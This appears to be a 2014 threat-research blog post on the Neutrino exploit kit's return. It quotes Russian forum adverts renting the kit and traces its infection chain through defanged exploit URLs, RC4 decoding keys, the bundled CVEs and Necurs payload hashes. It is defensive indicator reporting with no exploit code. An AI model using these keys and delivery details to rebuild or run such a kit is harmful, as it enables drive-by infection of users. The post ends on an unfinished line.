2014-11-21 - Landscape

Neutrino : The come back ! (or Job314 the Alter EK)

Disclaimer: Once again I won't go in deep analysis of the EK in that post.
It's more a connecting the dots one.
Big thanks: Timo Hirvonen,  @Malc0de , @EKWatcher@node5 for all the help on this.

In September a post from Alter appeared on underground. He was searching for traffic to test an exploit kit he was building.

Всем привет.
Ищем человека с большим и стабильным потоком трафа со своего лома.
Трафик нужен для отладки и тонкой настройки работы связки.
Что конкретно требуется: 
Скорость слива 1к хостов 3-5 минут.
Доступ в ТДС или любую другую панельку где я мог бы сам включать или выключать траф на тестовый поток связки в любое удобное для меня время.
ТДС должна поддерживать работу с API автозабора.

Со своей стороны:
Месяц на выделенном сервере бесплатно
Последующая аренда по льготным условиям

Приватное решение с ограниченным набором.
Будем рады серьезному человеку с репой.
Контакт PM.

Google Translated as :

Looking for a man with a large and stable flow of cores from your scrap.
Traffic needed for debugging and fine-tuning of the bunch.
What exactly is required:
Speed plum 1k hosts 3-5 minutes.
Access TDS or any other socket where I could turn on or off myself to the test stream traf ligament at any convenient time for me.
RTD should support the work with the API avtozabora.

For its part:
Month for a dedicated server for free
Leaseback on preferential terms

Private decision with a limited set.
We will be glad serious man with a turnip.
Contact PM.

On the 26th of september I spotted something that was a really good candidate for an "Alter EK".

Alter EK candidate - 2014-09-26
Many things were pointing to Alter EK :
- The chronology (we do not see new pattern really often)
- The payload was contacting back the EK
and other hints (traffic filtering upfront) were confirming a "Training Range".

Talking with Will Metcalf from Emerging Threats we decided to name that Exploit Kit : Job314 (cf Knock part).

Some new tricks there. The java calls were embedded in the Flash.
Same for the CVE-2013-2551 (IE) embedded inside flash.

We saw the evolution all the following weeks.

Job314 - Test Thread - 2014-10-20

A week ago Alter published a new advert :

Приватная связка с высоким пробивом и стабильной чистотой.
Месяц аренды от $3000
Аренда только на выделенных сервера.
Домены и фронты в стоимость аренды не входят.
Информация по составу эксплоитов не предоставляется.

Возможен тест на день 100$ (50к хостов).
Гарант только с данного борда и за ваш счет.

Jabber: [email protected]
Google Translated as :
Privacy punching a bunch of high purity and stable.
Month lease at $ 3000
Rent only on dedicated servers.
Domains and fronts in the rental price are not included.
Information on the composition of exploits is not available.

Possible test day $ 100 (50k hosts).
Guarantee only with this Bordeaux and at your expense.

Jabber: [email protected]

The big surprise was in the Screenshot :

Alter EK screenshots - Neutrino !

So after disappearing around the 17th of  March, Neutrino is back ! 

Rebuilt from Scratch it seems and what we called Job314 is this Neutrino "2".

Today checking a distribution path usually redirecting to Flash EK (Necurs in /sv62a76d18537/ )

Distribution Path to Necurs via "script" redirector and Flash EK
then few days of Angler EK with Necurs pushed in Bedep I landed on :

Neutrino Pushing Necurs
2014-11-20 (and drops callbacks)

Let's take a look at this

Neutrino Pass:

Neutrino - 4 CVE in 1 Flash

GET http://amtudatqfi.border2 .xyz:47130/establish/40006/disguise/67531/harmony/25804/duke/grunt/north/5261/cart/51566/peter/shove/solitary/labour/squat/glad/
200 OK (text/html)

Neutrino Landing - 2014-11-20
Straight to the flash
Unescaping the B64 blob and applying the RC4 key we can find in the flash

RC4 : lrnfsvobuudc

We get :

Path fired for each exploit
note the payload Key: uzxceruvsl

the different URI for the different Exploit.

GET http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js
200 OK (text/javascript)

GET http://amtudatqfi.border2 .xyz:47130/dark/9844/watch/5350/slip/64080/explanation/41483/mend/93598/collapse/39865/model/25005/
200 OK (text/html) Flash containing at least CVE-2014-6332, CVE-2013-2551, CVE-2014-0515, CVE-2014-0569   7a5f2d7efe55020e65dcdd77bcdf853e

The four Rc4ed Exploits embedded in the single flash
Neutrino 2014-11-21

GET http://wyuye.border2 .xyz:38779/false/hood/broom/9264/lover/22172/permit/45653/madam/44441/downstairs/grand/military/measure/themself/65550/
200 OK (application/octet-stream)  RC4 (Key : uzxceruvsl ) encoded Necurs f185111b2b0c61b26f2cdae1fee81031

Note : User-Agent: Mozilla

Based on what we saw earlier we can say that it's CVE-2014-6332 who owned that VM.

GET http://wyuye.border2 .xyz:38779/sweet.pl?whistle=word&more=start&wick=pressure&gasp=warm&join=victim&proper=52499&camera=44137&overhead=19904
404 Not Found (text/html) < CVE-2014-0569 calls. 404ed maybe because of the 200 OK on previous call.

File: That flash is well thought and seems easy to reuse, I will hold on this.
Fiddler pushed to VT here.
2014-11-24 - SWF : 19a6ef1cf490aec30018d95a4f07f42a
Let's finish with one advice from Will Metcalf (Emerging Threats) :